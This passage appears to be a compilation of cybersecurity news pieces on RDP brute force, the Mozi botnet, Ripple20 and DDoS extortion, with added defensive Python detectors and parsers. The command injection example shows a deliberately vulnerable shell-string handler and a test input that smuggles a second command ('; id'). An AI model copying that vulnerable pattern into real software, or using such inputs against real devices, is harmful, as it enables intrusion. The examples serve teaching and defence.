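The brute force activity described above shows up in the Windows Security log as a burst of failed logons (Event ID 4625) with logon type 10, which is the RemoteInteractive type used by RDP. The following is an added example, not code from the original article, from Kaspersky or from Microsoft. It assumes the Security log has been exported as one event per line in the simple key=value layout shown in the constructed sample, and it flags any source address that fails a configurable number of RDP logons inside a short window, noting whether a successful RDP logon (Event ID 4624) from the same source followed.

```python
"""Flag RDP brute-force attempts in exported Windows Security log lines.

Added example (not part of the original article). Assumes a one-event-per-line
export with EventID, LogonType, TargetUserName and IpAddress fields. Event ID
4625 = failed logon, 4624 = successful logon, logon type 10 = RemoteInteractive
(RDP). The sample below is constructed for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample export (ISO 8601 timestamps, documentation IP ranges).
SAMPLE_LOG = """\
2020-09-14T02:00:01 EventID=4625 LogonType=10 TargetUserName=administrator IpAddress=203.0.113.7
2020-09-14T02:00:02 EventID=4625 LogonType=10 TargetUserName=admin IpAddress=203.0.113.7
2020-09-14T02:00:03 EventID=4625 LogonType=10 TargetUserName=user IpAddress=203.0.113.7
2020-09-14T02:00:04 EventID=4625 LogonType=10 TargetUserName=test IpAddress=203.0.113.7
2020-09-14T02:00:05 EventID=4625 LogonType=10 TargetUserName=backup IpAddress=203.0.113.7
2020-09-14T02:00:06 EventID=4625 LogonType=10 TargetUserName=scanner IpAddress=203.0.113.7
2020-09-14T02:05:00 EventID=4624 LogonType=10 TargetUserName=backup IpAddress=203.0.113.7
2020-09-14T02:10:00 EventID=4625 LogonType=10 TargetUserName=jsmith IpAddress=198.51.100.20
2020-09-14T02:11:00 EventID=4624 LogonType=10 TargetUserName=jsmith IpAddress=198.51.100.20
2020-09-14T02:12:00 EventID=4625 LogonType=3 TargetUserName=svc IpAddress=192.0.2.9
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<eid>\d+) LogonType=(?P<lt>\d+) "
    r"TargetUserName=(?P<user>\S+) IpAddress=(?P<ip>\S+)$"
)


def parse(log_text):
    """Yield (timestamp, event_id, logon_type, user, ip) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        yield (datetime.fromisoformat(m["ts"]), int(m["eid"]),
               int(m["lt"]), m["user"], m["ip"])


def find_rdp_bruteforce(log_text, threshold=5, window=timedelta(minutes=5)):
    """Return {ip: finding} for sources with >= threshold failed RDP logons
    inside a sliding window. Each finding records the attempt count, the
    distinct usernames tried and whether a successful RDP logon (4624) from
    the same source occurred after the burst, which is what should page an
    analyst: a password guess that worked."""
    events = list(parse(log_text))
    failures = defaultdict(list)
    for ts, eid, lt, user, ip in events:
        if eid == 4625 and lt == 10:          # failed RDP logon only
            failures[ip].append((ts, user))
    findings = {}
    for ip, fails in failures.items():
        fails.sort()
        for i in range(len(fails)):
            j = i
            while j < len(fails) and fails[j][0] - fails[i][0] <= window:
                j += 1
            if j - i >= threshold:
                last_fail = fails[j - 1][0]
                success_after = any(
                    e_eid == 4624 and e_lt == 10 and e_ip == ip and e_ts >= last_fail
                    for e_ts, e_eid, e_lt, _, e_ip in events)
                findings[ip] = {"attempts": j - i,
                                "users": sorted({u for _, u in fails[i:j]}),
                                "success_after": success_after}
                break
    return findings


if __name__ == "__main__":
    for ip, f in find_rdp_bruteforce(SAMPLE_LOG).items():
        print(ip, f)
```

Only the source that cycled through six usernames in a few seconds is reported; the single failure followed by a success from 198.51.100.20 is ordinary user behaviour, and the logon type 3 failure is not RDP at all. Tune `threshold` and `window` to the environment, and treat a `success_after` of True as an incident rather than an alert.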
Virtual Private Network (VPN)
The use of a Virtual Private Network (VPN) is one of the measures for securing RDP. This too has been the subject of attacks by threat actors.
In August of this year, the Canadian Centre for Cyber Security issued an alert warning organizations of the active exploitation of vulnerabilities in the VPN products of Fortinet, Palo Alto and Pulse Secure. The vendors of these VPN products had all issued a corresponding patch prior to the issuance of the Canadian Centre for Cyber Security’s alert.
Role of Remote IT Support
As the world moves towards a remote workforce, it’s not surprising that IT support is now being done remotely as well.
The recent exploitation of CVE-2020-1472, CVE-2019-0604 and VPN products highlights the importance of timely patching. Remote IT support can assist your organization in patch management, including planning and prioritizing software and firmware updates within a network. If not properly planned, a patch can cause extended downtime, resulting in revenue loss.
Remote IT support can also assist your organization in using network perimeter security devices such as firewalls and remote access gateways for remote workers and remote IT administrators.
Mozi Botnet Accounts for 90% of Traffic to and from IoT Devices, IBM Report Shows
Researchers at IBM recently reported that 90% of traffic to and from all internet of things (IoT) devices comes from the botnet called “Mozi”.
What Is a Botnet?
A botnet, also known as a “zombie army”, is a group of hijacked computers, including IoT devices. Each of these hijacked computers is infected with malicious software (malware) so that it can be controlled from a remote location without the knowledge of its owner.
Threat actors have used these hijacked computers for malicious activities such as distributed denial-of-service (DDoS) attacks. In a DDoS attack, traffic from the hijacked computers is directed at a target, for instance a website, overwhelming the target with traffic and rendering it inaccessible to legitimate users. A malicious actor, for example, sent a DDoS ransom note taunting a target that their “Botnet army” was ready to take down the target’s website and that the target had 48 hours to pay the ransom.
What Is Mozi Botnet?
Researchers at 360 Netlab were the first to report on the Mozi botnet. According to the researchers, they first observed Mozi in the wild in September 2019.
In the recent report released by researchers at IBM, the researchers said that Mozi accounted for nearly 90% of the observed IoT network traffic from October 2019 to June 2020. They added that the combined number of IoT attack instances from October 2019 to June 2020 increased by 400% compared to the combined number for the previous two years.
The researchers at IBM suggested that this massive traffic from Mozi shows that the botnet didn’t remove competitors from the market, but rather flooded the market, dwarfing other botnets. The hijacking of IoT devices to form part of the Mozi botnet, the researchers said, could be due in part to the ever-expanding IoT landscape.
According to IBM researchers, there are nearly 31 billion IoT devices deployed around the world, with the IoT deployment rate now standing at 127 devices per second. IoT devices include consumer IoT (security cameras and lighting control); commercial IoT (internet-connected pacemakers and vehicle trackers); enterprise IoT (projectors, routers and security systems); industrial IoT (production line automation systems and aircraft systems); infrastructure IoT (traffic control devices and utility monitoring devices); and the Internet of Military Things (wearable combat biometrics devices, robots and surveillance equipment).
Researchers from 360 Netlab and IBM reported that Mozi is capable of the following malicious activities: conducting DDoS attacks (HTTP, TCP, UDP), carrying out command execution attacks, downloading a malicious payload from a specified URL and executing it, and gathering bot information. Devices affected by Mozi include Netgear, D-Link and Huawei routers.
How Does Mozi Hijack IoT Devices to Form Part of Its Botnet?
According to IBM researchers, nearly all of the initial entry to these Mozi-hijacked devices was done through command injection (CMDi) attacks.
“Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application,” Open Web Application Security Project (OWASP) defines CMDi. “Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation. In Command Injection, the attacker extends the default functionality of the application, which execute system commands, without the necessity of injecting code.”
Researchers at IBM said CMDi attacks are extremely popular against IoT devices for the following reasons:
First, IoT embedded systems commonly contain a web interface and a debugging interface left over from firmware development that can be exploited.
Second, PHP modules that are built into IoT web interfaces can be exploited, giving threat actors remote execution capability.
Third, IoT interfaces are often left vulnerable when deployed as administrators “fail to harden the interfaces by sanitizing expected remote input”. This failure, the researchers said, allows threat actors to input shell commands.
Fourth, new vulnerabilities require constant updating, and slow patch implementation can be exploited.
Fifth, CMDi attacks can easily be automated, allowing threat actors to hijack a large number of IoT devices quickly at low cost.
Sixth, IBM researchers suggested that Mozi continues to be successful largely through the use of CMDi attacks as corporate networks are being accessed remotely more often due to COVID-19.
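The OWASP definition and the third reason above describe the same root cause: a web handler that hands remote input to a system shell without sanitizing it. The following is an added example, not code from the original article, from IBM or from OWASP. It models a diagnostic page of the kind found on routers and cameras that lets an administrator ping a host; the vulnerable version builds a shell command string from the request parameter, while the hardened version validates the parameter against an allow-list (an IP literal or a syntactically valid hostname) and passes it as a separate argv element so that no shell ever interprets it. The function names and the sample input are constructed for this illustration.

```python
"""Command injection in an IoT-style web handler: vulnerable vs hardened.

Added example, not from the original article or from the IBM/OWASP material
it cites. Models a "ping a host" diagnostic handler. The hardened form does
two independent things: allow-list validation of the parameter and passing it
as an argv element (shell=False), so even an unexpected value never reaches a
shell parser.
"""
import ipaddress
import re
import subprocess


# --- Vulnerable pattern: untrusted input concatenated into a shell string.
def build_ping_command_vulnerable(host: str) -> str:
    """Return the exact string the handler would hand to a shell. Anything the
    user appends after a shell metacharacter (';', '&&', '|', '`', '$()')
    becomes a second command run with the web server's privileges."""
    return "ping -c 1 " + host


# --- Hardened pattern: allow-list validation plus argv, never a shell.
# RFC 1123-style hostname: dot-separated labels of letters, digits and
# hyphens, no leading/trailing hyphen, at most 253 characters overall.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def validate_host(host: str) -> str:
    """Accept only an IPv4/IPv6 literal or a syntactically valid hostname.
    Returns the normalized value; raises ValueError for everything else."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise ValueError(f"rejected host parameter: {host!r}")


def is_valid_host(host: str) -> bool:
    """Boolean wrapper around validate_host for callers that want no exception."""
    try:
        validate_host(host)
        return True
    except ValueError:
        return False


def build_ping_argv(host: str) -> list:
    """argv list for subprocess.run(..., shell=False). The host is one
    argument, so shell metacharacters inside it carry no meaning."""
    return ["ping", "-c", "1", validate_host(host)]


def run_ping(host: str) -> int:
    """Execute the hardened form and return the process exit status."""
    return subprocess.run(build_ping_argv(host), capture_output=True).returncode


if __name__ == "__main__":
    # Constructed attacker-style input: a second command appended with ';'.
    tainted = "192.0.2.1; id"
    print("vulnerable handler would run:", build_ping_command_vulnerable(tainted))
    try:
        build_ping_argv(tainted)
    except ValueError as e:
        print("hardened handler:", e)
```

Validation alone is not enough in the vulnerable form, because any bypass of the regular expression still reaches a shell; argv passing alone is not enough either, because the ping binary would still receive arbitrary option strings. Doing both is the pattern worth copying into firmware web interfaces.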
Israel-based cybersecurity firm JSOF earlier reported that vulnerabilities in the Treck TCP/IP stack put hundreds of millions of IoT and embedded devices at risk. Developed 20 years ago, the Treck TCP/IP stack is a piece of software that serves as a basic building block for any IoT or embedded device that works over a network.
Out of the 19 security vulnerabilities discovered in the Treck TCP/IP stack, 4 are rated as critical remote code execution vulnerabilities. With remote code execution, a threat actor in any geographical location could run malicious programs on the target device.
Cybersecurity Best Practices
Here are some cybersecurity best practices for preventing your organization’s IoT devices from being hijacked and made part of a botnet: keep all firmware up to date, and retire devices that no longer receive security updates.
Using outdated IoT devices, or those that no longer receive security updates, leaves these devices vulnerable to hijacking and being made part of a botnet for malicious activities such as DDoS attacks.
On the flip side, with the proliferation of hijacked IoT devices, it’s important to protect your organization from DDoS attacks.
Bugs in Treck TCP/IP Stack Put Hundreds of Millions of IoT and Embedded Devices At Risk
Nineteen vulnerabilities in a piece of software called the “Treck TCP/IP Stack” have recently been discovered. This software is present in hundreds of millions of IoT and embedded devices, putting these devices and the devices connected to them at risk.
The 19 vulnerabilities in the Treck TCP/IP stack are collectively called “Ripple20”, with emphasis on the word “ripple”, as the ripple effect of these vulnerabilities has grown exponentially due to the supply chain factor. Out of the 19 vulnerabilities discovered, 2 were disclosed anonymously and 17 were disclosed by Israel-based cybersecurity firm JSOF.
“A single vulnerable component, though it may be relatively small in and of itself, can ripple outward to impact a wide range of industries, applications, companies, and people,” JSOF said in the report "19 Zero-Day Vulnerabilities Amplified by the Supply Chain". “Ripple20 reached critical IoT devices from a wide range of fields, involving a diverse group of vendors.”
Tracing the Supply Chain
The TCP/IP stack was developed 20 years ago by a firm called “Treck”. This piece of software serves as a basic networking element or building block, useful in any context for any IoT or embedded device that works over a network.
According to JSOF, over the past two decades the Treck TCP/IP stack has spread around the world through both direct and indirect use. JSOF reported that in the 1990s, Treck collaborated with a Japanese company named Elmic Systems. The two later went their separate ways, resulting in two separate branches of the TCP/IP stack, one managed by Treck and the other managed by Elmic Systems. Other than ELMIC, the Treck TCP/IP stack is also known by other names such as Net+ OS, Quadnet, GHNET v2, and Kwiknet.
Printers, routers, infusion pumps in the medical sector, and industrial controls are some of the devices affected by these vulnerabilities. Device vendors affected by the 19 vulnerabilities discovered in the Treck TCP/IP stack include HP, Schneider Electric, Intel, Rockwell Automation, Caterpillar, and Baxter. JSOF estimates that the 19 discovered vulnerabilities affect hundreds of millions of devices or more.
Security Vulnerabilities in Treck TCP/IP
Out of the 19 security vulnerabilities discovered in the Treck TCP/IP stack, 4 are rated as critical remote code execution vulnerabilities with CVSS ≥ 9; 4 are major with CVSS ≥ 7; and 11 more have various lower severities. CVSS, short for Common Vulnerability Scoring System, is the industry standard for assessing the severity of computer system security vulnerabilities, with the most critical rated 10.
Security vulnerabilities designated as CVE-2020-11896, CVE-2020-11898, and CVE-2020-11901 are some of the notable ones among the 19 vulnerabilities.
CVE-2020-11896 is a critical vulnerability in the Treck TCP/IP stack. It allows remote code execution by any attacker that can send UDP packets to an open port on the target device. Remote code execution allows attackers in any geographical location to run programs on the target device.
CVE-2020-11898 is a security vulnerability in the Treck TCP/IP stack that improperly handles an IPv4/ICMPv4 length parameter inconsistency, which allows remote attackers to trigger an information leak. JSOF researchers tested the CVE-2020-11896 and CVE-2020-11898 vulnerabilities on the Digi Connect ME 9210, an embeddable device that is used in medical devices. Digi Connect can be purchased from any of the large electronic-parts resellers, amplifying these vulnerabilities, as any device it is embedded in also becomes vulnerable.
Among the 19 security vulnerabilities in the Treck TCP/IP stack, the most severe is CVE-2020-11901, which received a CVSS score of 9.1. This designation covers several critical client-side vulnerabilities in the DNS resolver of the Treck TCP/IP stack.
If successfully exploited, this vulnerability allows pre-authentication arbitrary remote code execution. This vulnerability is of particular interest because a sophisticated attacker, such as a nation state “can potentially reply to a DNS request from outside of the corporate network, thus breaking network segmentation,” researchers at JSOF said.
JSOF researchers tested the CVE-2020-11901 vulnerability on a Schneider Electric UPS device, model APC Smart-UPS 750 (SMT750I/ID18/230V). A UPS, short for Uninterruptible Power Supply, is a device designed for use in enterprise networks, data centers, and mission-critical systems. It serves as an embedded battery to ensure that devices connected to it won’t suffer from power outages or fluctuations. Remotely exploiting a UPS device can, therefore, have disastrous consequences.
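The phrase “length parameter inconsistency” in the description of CVE-2020-11898 names a whole class of embedded networking bugs: a header carries a length field, the code trusts the field instead of the number of bytes actually received, and a read or copy runs past the buffer. The following is an added example, not code from the original article, from JSOF or from the Treck stack, and it makes no claim about how Treck’s code is written. It is a small IPv4/UDP parser that shows the consistency checks a stack has to make before it trusts any length field (IHL against the minimum header, total length against the bytes received, UDP length against the IP payload), together with a packet builder whose `total_len` and `udp_len` overrides let you craft inconsistent headers to confirm that each check fires. Packets and addresses are constructed for this illustration.

```python
"""Length-consistency checks for IPv4 and UDP headers.

Added example, not from the JSOF Ripple20 report and not Treck's code. It
demonstrates the class of bug ("length parameter inconsistency") described
above: every length field is checked against what was actually received
before it is used to slice the buffer. Checksums are not verified here.
"""
import struct

IPPROTO_UDP = 17


class MalformedPacket(Exception):
    """Raised for any packet whose length fields disagree with the data."""


def parse_ipv4_udp(buf: bytes):
    """Return (src, dst, sport, dport, payload) or raise MalformedPacket."""
    if len(buf) < 20:
        raise MalformedPacket("frame shorter than minimum IPv4 header")
    version_ihl = buf[0]
    if version_ihl >> 4 != 4:
        raise MalformedPacket("not IPv4")
    ihl = (version_ihl & 0x0F) * 4            # header length in bytes
    if ihl < 20:
        raise MalformedPacket("IHL smaller than minimum header")
    if ihl > len(buf):
        raise MalformedPacket("IHL exceeds received bytes")
    total_len = struct.unpack("!H", buf[2:4])[0]
    if total_len < ihl:
        raise MalformedPacket("total length smaller than header")
    if total_len > len(buf):
        # The classic inconsistency: the field promises more bytes than exist.
        raise MalformedPacket("total length exceeds received bytes")
    proto = buf[9]
    src = ".".join(str(b) for b in buf[12:16])
    dst = ".".join(str(b) for b in buf[16:20])
    ip_payload = buf[ihl:total_len]            # link-layer padding is ignored
    if proto != IPPROTO_UDP:
        raise MalformedPacket("not UDP")
    if len(ip_payload) < 8:
        raise MalformedPacket("IP payload shorter than UDP header")
    sport, dport, udp_len, _csum = struct.unpack("!HHHH", ip_payload[:8])
    if udp_len < 8 or udp_len > len(ip_payload):
        # UDP carries its own length; it must fit inside what IP delivered.
        raise MalformedPacket("UDP length inconsistent with IP payload")
    return src, dst, sport, dport, ip_payload[8:udp_len]


def build_ipv4_udp(src, dst, sport, dport, payload, total_len=None, udp_len=None):
    """Build an IPv4/UDP packet. total_len / udp_len overrides deliberately
    produce inconsistent headers for testing the parser. Checksums are zero."""
    udp_len = 8 + len(payload) if udp_len is None else udp_len
    udp = struct.pack("!HHHH", sport, dport, udp_len, 0) + payload
    total_len = 20 + len(udp) if total_len is None else total_len
    ip = struct.pack("!BBHHHBBH4s4s",
                     0x45, 0, total_len, 0, 0, 64, IPPROTO_UDP, 0,
                     bytes(int(x) for x in src.split(".")),
                     bytes(int(x) for x in dst.split(".")))
    return ip + udp


def check(buf: bytes) -> str:
    """Convenience wrapper: 'ok' or the reason the packet was rejected."""
    try:
        parse_ipv4_udp(buf)
        return "ok"
    except MalformedPacket as e:
        return str(e)


if __name__ == "__main__":
    good = build_ipv4_udp("192.0.2.1", "192.0.2.2", 1234, 53, b"hello")
    print(check(good), parse_ipv4_udp(good))
    print(check(build_ipv4_udp("192.0.2.1", "192.0.2.2", 1, 2, b"abc", total_len=2000)))
    print(check(build_ipv4_udp("192.0.2.1", "192.0.2.2", 1, 2, b"abc", udp_len=500)))
```

The order of the checks matters: the IHL is validated before it is used to locate the UDP header, and the IP total length is validated before it is used to bound the UDP length, so no later check ever depends on a field that has not already been confirmed against the real buffer size.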
Preventive and Mitigating Measures
Here are some cybersecurity measures for preventing or mitigating the effects of the 19 vulnerabilities discovered in the Treck TCP/IP stack:
Keep all Firmware and Software Up to Date
Some vendors of the products affected by the 19 vulnerabilities discovered in the Treck TCP/IP stack, such as Aruba Networks, Digi International, HP, Intel, Teradici and Xerox, have issued a corresponding patch or security update fixing the said vulnerabilities.
Retire Devices that No Longer Receive Security Updates
“The Treck stack has been around for more than 20 years,” JSOF researchers said. “Possibly the vulnerabilities too.”
Because of this length of time, some of the IoT and embedded devices affected by the vulnerabilities discovered in the Treck TCP/IP stack may no longer receive security updates. Continued use of vulnerable devices puts your organization’s network at risk of cyberattacks.
Devices which no longer receive security updates, and which have served their purpose for years, should no longer be used. Luckily, some of these devices are inexpensive; as such, it’s much cheaper to replace them with the latest versions than to keep using outdated devices which only put your organization’s network at risk.
Rise of Phishing and DDoS Attacks in the Education Sector
COVID-19 resulted in the temporary shutdown of schools and universities across the world. This has given rise to online classes, whereby classes are conducted remotely and on digital platforms.
As schools and universities across the world reopen, many opt for mixed physical and online classes, while some still opt for purely online classes. The shift to online classes, however, has opened a window for malicious actors to exploit.
The shift to online classes gives rise to phishing attacks and distributed denial of service (DDoS) attacks directed against the education sector.
Phishing is one of the oldest and most popular forms of cybercrime. In a phishing campaign, intended victims, whether targeted or random individuals, are tricked into clicking something that leads to the stealing of data or the downloading of malicious software (malware).
Microsoft Security Intelligence has found that as of September 7, 2020, out of the nearly 8.7 million malware encounters reported in the last 30 days, 59.84% came from the education sector, making it the most affected sector.
In the report “Digital Education: The cyberrisks of the online classroom”, Kaspersky Lab said that attackers lure victims into downloading malware by bundling fake versions of popular video meeting apps and online course platforms as legitimate application installers. Victims encounter these fake installers through phishing websites, that is, sites designed to look like legitimate websites for downloading popular video meeting apps and online course platform installers.
Another way by which victims encounter these fake installers is through phishing emails that masquerade as special offers or notifications. Downloading the fake video meeting apps and online course platform installers, whether from phishing websites or phishing emails, could lead to the installation and running of malicious software on the victim’s computer or the stealing of sensitive data.
In April of this year, researchers at Check Point reported that in a span of just 3 weeks, nearly 2,500 new websites relating to the video conferencing app Zoom were registered. Out of these 2,500 new Zoom-related websites, 1.5% were found to be malicious and another 13% were found to be suspicious. The researchers added that cybercriminals impersonated other video conferencing apps such as Microsoft Teams and Google Meet.
Researchers at Check Point reported that victims fell prey to phishing emails with the subject “You have been added to a team in Microsoft Teams”. The phishing emails contained a malicious website URL which, at first glance, looks similar to the legitimate Microsoft Teams URL. A double-check of this URL, however, shows that it is a fake one, and victims who landed on this fake Microsoft Teams site ended up downloading malware.
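The “double-check” that the Check Point research calls for can be automated for the links that reach your users. The following is an added example, not code from the original article or from Check Point. It extracts the hostname from a URL, reduces it to a skeleton in which commonly substituted characters (the digit 0 for the letter o, Cyrillic letters that look like Latin ones, and so on) are folded back to their Latin look-alikes, and then compares that skeleton against a short allow-list of domains the organization trusts, reporting a hostname as trusted, a lookalike (one character away from, or a homoglyph of, a trusted name), suspicious (a trusted brand embedded in an unrelated domain) or unknown. The allow-list, the confusable table and the sample URLs are constructed for this illustration, not a complete registry.

```python
"""Classify link hostnames as trusted, lookalike, suspicious or unknown.

Added example (not from the original article or from Check Point). The
allow-list and the confusable table below are illustrative assumptions; a
production filter would carry the organization's real domains and a fuller
confusables table.
"""
from urllib.parse import urlsplit

# Constructed allow-list: domains this organization treats as legitimate.
TRUSTED_DOMAINS = ("teams.microsoft.com", "microsoft.com", "zoom.us")

# Characters commonly substituted to imitate a Latin letter (partial table).
CONFUSABLES = str.maketrans({
    "0": "o", "1": "l", "3": "e", "5": "s", "7": "t",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0455": "s", "\u0456": "i", "\u04bb": "h",
    "\u0131": "i", "\u0142": "l", "\u03bf": "o", "\u0501": "d",
})


def skeleton(name: str) -> str:
    """Fold a hostname to the Latin string it is trying to look like."""
    return name.lower().translate(CONFUSABLES).replace("rn", "m").replace("vv", "w")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (insert/delete/substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_url(url: str, trusted=TRUSTED_DOMAINS):
    """Return (verdict, trusted_domain_or_None) for the URL's hostname."""
    host = (urlsplit(url).hostname or "").rstrip(".").lower()
    # 1. Exact match or a subdomain of a trusted domain: trusted.
    for t in trusted:
        if host == t or host.endswith("." + t):
            return ("trusted", t)
    # 2. Same as a trusted name after confusable folding, or one edit away:
    #    lookalike (micr0soft.com, teams-microsoft.com, Cyrillic o in zoom.us).
    sk = skeleton(host)
    for t in trusted:
        if sk == t or sk.endswith("." + t) or edit_distance(sk, t) <= 1:
            return ("lookalike", t)
    # 3. A trusted brand used as a label inside an unrelated domain:
    #    suspicious (microsoft.com.account-verify.example).
    labels = host.replace("-", ".").split(".")
    for t in trusted:
        if t.split(".")[0] in labels:
            return ("suspicious", t)
    return ("unknown", None)


if __name__ == "__main__":
    # Constructed sample links, in the style of the lure described above.
    for link in ("https://teams.microsoft.com/l/team/abc",
                 "https://teams.micr0soft.com/join",
                 "https://teams-microsoft.com/join",
                 "https://microsoft.com.account-verify.example/login",
                 "https://www.example.org/"):
        print(classify_url(link), link)
```

The order of the three passes is deliberate: a genuine subdomain of a trusted domain must never be reported as a lookalike, and a hostname that is one edit away from a trusted name must be reported as a lookalike before the weaker “brand embedded elsewhere” rule gets a chance to downgrade it to merely suspicious.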
Distributed Denial-of-Service (DDoS) Attacks
In a DDoS attack, a botnet, referring to a network of computers infected with self-propagating malware, is used by an attacker to overwhelm the target or its surrounding infrastructure with a flood of internet traffic. According to Kaspersky Lab, between January 2020 and June 2020, the number of DDoS attacks affecting the education sector in each month increased by at least 350% when compared to the corresponding month in 2019.
Authorities recently arrested a 16-year-old in connection with a series of DDoS attacks on Miami-Dade County Public Schools that disrupted the district's first week of online classes. The teenager admitted to launching the DDoS attacks using Low Orbit Ion Cannon (LOIC).
LOIC is a decade-old application originally developed for network stress testing. Since becoming an open-source application, it has been used for malicious activities such as DDoS attacks. A successful DDoS attack using LOIC floods a target server with TCP, UDP, or HTTP packets with the goal of disrupting service.
A DDoS attack via LOIC uses IRC chat channels to run a “Hivemind” version of LOIC. This allows a primary user of the IRC chat to control secondary computers, creating a botnet, referring to a network of computers controlled by the primary user for malicious activities such as DDoS.
LOIC was used in the past to launch DDoS attacks against Visa and MasterCard websites in response to the freezing of payments to WikiLeaks. A notable characteristic of LOIC is that attackers using it to launch DDoS attacks are unable to hide their IP addresses, making it easy for authorities to track them down. Because of this IP address visibility, authorities in many countries have taken legal action against DDoS attackers leveraging LOIC.
Preventive and Mitigating Measures Against Phishing and DDoS Attacks
To stay safe from phishing attacks, be wary of clicking anything online, as it could lead you to a phishing site. Also double-check URLs, as a difference of one letter or character could lead you to a malicious site.
To stay safe from DDoS attacks, including DDoS attacks leveraging LOIC, use a WAF, short for Web Application Firewall. A WAF specifically provides strong protection against HTTP floods. As protection against TCP and UDP floods, use a dedicated DDoS protection service.
DDoS Extortions Return
Over the past few weeks, a group of cybercriminals has launched distributed denial-of-service (DDoS) attacks targeting companies in the finance and retail sectors and demanding ransom payment for the attacks to stop.
In the blog post "Ransom Demands Return: New DDoS Extortion Threats From Old Actors Targeting Finance and Retail", Akamai reported that over the past few weeks, a series of DDoS attacks from the so-called "Armada Collective" and "Fancy Bear" actors have targeted businesses across multiple sectors, including finance and retail, and these DDoS attacks come with extortion demands. Some of the attacks peaked at almost 200 gigabyte per second (GB/s), Akamai said.
ZDNet likewise reported that in the past weeks, a criminal group that goes with the names "Armada Collective" and "Fancy Bear" has launched DDoS attacks against some of the biggest financial service providers and demanded payments in the form of the cryptocurrency bitcoin as extortion fees to stop the DDoS attacks.
Incidentally, a few days ago, the operations of the New Zealand stock exchange were disrupted as a result of a DDoS attack. Other than the comment that the attack came from overseas, authorities in New Zealand won't comment on whether or not the DDoS attack also involved a ransom demand.
Evolution of DDoS Extortions
DDoS extortion is nothing new. This type of extortion has been around for the last few years. The recent DDoS extortions, however, differ from the older DDoS extortions in terms of methods and severity.
The recent DDoS extortion campaign described by Akamai and ZDNet resembles the type of DDoS extortion campaign described in the alert entitled “DDoS extortion campaign targeting financial sector” released on November 1, 2019 by the Computer Emergency Response Team New Zealand (CERT NZ).
According to CERT NZ, it received reports relating to a DDoS extortion campaign targeting companies within the financial sector in New Zealand. This extortion campaign had also been observed in other countries, CERT NZ said. As described by CERT NZ, the DDoS extortion campaign followed these steps:
First, the target company receives an email stating “We are the Fancy Bear and we have chosen [Company Name] as a target for our next DDoS attack.” In the email, the attackers give the target company a deadline for when the major DDoS attack will happen and demand a ransom from the target to prevent the said attack.
Second, to show the target that the major DDoS attack is coming, a minor DDoS attack is launched against an IP address belonging to the company’s network. These demo attacks generally last for 30 minutes.
In the DDoS extortion campaign observed by Akamai, the targets were warned that going public about the extortion demand would result in an immediate major DDoS attack. The extortion demand also threatened the targets that the major attack would make websites and other connected services “unavailable for everyone” and would harm the target’s reputation.
While past DDoS extortion campaigns targeted the victims’ websites, the recent extortion campaign described by CERT NZ, Akamai and ZDNet targeted the victims’ backend infrastructure, resulting in prolonged and severe outages. An example of an attack on backend infrastructure is a DDoS attack on the target’s web hosting provider, resulting in outages of the ultimate target’s website.
In the case of the attack on the New Zealand stock exchange, the stock exchange’s web hosting provider Spark was targeted in a series of DDoS attacks, resulting in outages at the New Zealand stock exchange as well as downtime of the websites of Spark’s other customers.
Reflective DDoS Techniques
In the November 2019 alert, CERT NZ said that the so-called Fancy Bear threat group overwhelms the target using a variety of reflective DDoS techniques, with targets including services using the following protocols:
A reflective DDoS technique is a DDoS attack that depends on publicly accessible UDP servers to overwhelm a victim’s system with UDP traffic. UDP, short for User Datagram Protocol, is an internet communication protocol for time-sensitive transmissions such as video chat. UDP is designed not to validate source Internet Protocol (IP) addresses so that the protocol can operate very quickly. This, however, creates an exploitation opportunity for attackers.
In general, in a reflective DDoS attack, an attacker who is able to spoof IP addresses sends fake requests, carrying the victim’s address as the source, to a vulnerable UDP server. The UDP server, not knowing the request is fake, prepares the response and sends it to the address the request claims to come from. These UDP responses are therefore delivered to the unsuspecting target, overwhelming the target’s resources such as the network itself.
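Because the spoofed request is small and the server’s reply is large, reflection leaves a measurable signature in flow data: a service port on one host sends far more bytes to a single address than that address ever sent to it. The following is an added example, not code from the original article, from CERT NZ, Akamai or ZDNet. It reads a simplified NetFlow-style CSV (a format assumed for this example), pairs UDP requests with the replies that answer them, and reports any (service, peer) pair whose reply-to-request byte ratio exceeds a threshold. The same logic works from both vantage points the text describes: a site being used as a reflector sees the spoofed requests and its own oversized replies, while the ultimate target sees replies to requests it never sent. The flow records and addresses are constructed.

```python
"""Detect UDP reflection/amplification in flow records.

Added example, not from CERT NZ, Akamai or ZDNet. Assumes a simplified
NetFlow-style CSV: src,sport,dst,dport,proto,bytes,packets (proto 17 = UDP,
6 = TCP). Ports below 1024 are treated as the service side of a flow. The
records below are constructed for illustration.
"""
import csv
import io
from collections import defaultdict

SAMPLE_FLOWS = """\
src,sport,dst,dport,proto,bytes,packets
192.0.2.10,40001,198.51.100.53,53,17,80,1
198.51.100.53,53,192.0.2.10,40001,17,200,1
203.0.113.5,33333,198.51.100.53,53,17,600,10
198.51.100.53,53,203.0.113.5,33333,17,48000,10
198.51.100.123,123,203.0.113.5,4444,17,40000,80
192.0.2.11,50000,198.51.100.80,443,6,5000,40
198.51.100.80,443,192.0.2.11,50000,6,900000,700
"""


def load_flows(text):
    """Parse the CSV into a list of dicts with numeric fields converted."""
    rows = []
    for r in csv.DictReader(io.StringIO(text)):
        rows.append({"src": r["src"], "sport": int(r["sport"]),
                     "dst": r["dst"], "dport": int(r["dport"]),
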